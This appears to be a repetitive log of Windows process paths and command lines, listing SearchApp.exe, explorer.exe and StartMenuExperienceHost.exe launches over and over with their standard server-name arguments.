C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

